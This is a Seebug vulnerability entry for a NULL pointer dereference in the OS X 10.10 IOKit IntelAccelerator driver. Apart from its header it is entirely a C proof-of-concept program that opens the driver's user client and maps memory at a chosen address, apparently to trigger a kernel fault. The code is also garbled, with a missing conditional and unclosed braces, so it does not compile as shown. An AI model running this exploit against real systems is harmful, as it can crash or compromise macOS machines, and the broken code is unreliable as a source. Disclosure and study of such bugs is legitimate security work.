OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference

ID SSV:89441
Type seebug
Reporter Anonymous
Modified 2015-09-16T00:00:00


No description provided by source.

                                                #include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <IOKit/IOKitLib.h>

int main(){
  kern_return_t err;

  CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
    printf("unable to create service matching dictionary\n");
    return 0;

  io_iterator_t iterator;
  err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
  if (err != KERN_SUCCESS){
    printf("no matches\n");
    return 0;

  io_service_t service = IOIteratorNext(iterator);

  if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    return 0;
  printf("got service: %x\n", service);

  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 2, &conn);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 0;
    printf("got userclient connection: %x\n", conn);

  mach_vm_address_t addr = 0x414100000000;
  mach_vm_size_t size = 0x1000;

  err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
  return 0;